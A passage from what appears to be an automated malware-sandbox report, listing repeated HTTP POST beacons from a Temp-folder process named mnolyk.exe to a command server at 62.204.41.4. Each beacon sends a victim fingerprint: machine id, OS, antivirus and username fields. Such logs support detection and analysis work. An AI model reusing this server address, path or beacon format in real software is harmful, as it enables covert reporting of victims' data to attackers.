                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:34.966207981 CET1040INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:34 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      581192.168.2.75030962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:35.147885084 CET1041OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:35.214554071 CET1041INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:35 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      582192.168.2.75031062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:35.397049904 CET1042OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:35.460278034 CET1042INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:35 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      583192.168.2.75031162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:35.648200989 CET1043OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:35.711546898 CET1043INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:35 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      584192.168.2.75031262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:35.876032114 CET1044OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:35.939383030 CET1044INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:35 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      585192.168.2.75031362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:36.114306927 CET1045OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:36.181561947 CET1045INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      586192.168.2.75031462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:36.369028091 CET1046OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:36.434140921 CET1046INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      587192.168.2.75031562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:36.612364054 CET1047OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:36.680104017 CET1047INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      588192.168.2.75031662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:36.846930027 CET1048OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:36.911777973 CET1048INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      589192.168.2.75031762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:37.080324888 CET1049OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:37.146085024 CET1049INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      59192.168.2.74978462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:11.941698074 CET497OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:12.006139040 CET498INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      590192.168.2.75031862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:37.320678949 CET1050OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:37.383331060 CET1050INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      591192.168.2.75031962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:37.557363987 CET1051OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:37.621031046 CET1051INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      592192.168.2.75032062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:37.801532030 CET1052OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:37.867260933 CET1052INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      593192.168.2.75032262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:38.036621094 CET1059OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:38.104947090 CET1060INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      594192.168.2.75032362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:38.290728092 CET1061OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:38.358603001 CET1061INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      595192.168.2.75032462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:38.548279047 CET1062OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:38.612684011 CET1062INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      596192.168.2.75032562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:38.783317089 CET1063OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:38.850310087 CET1063INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      597192.168.2.75032662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:39.035983086 CET1064OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:39.102859020 CET1064INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      598192.168.2.75032762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:39.273407936 CET1065OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:39.339062929 CET1065INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
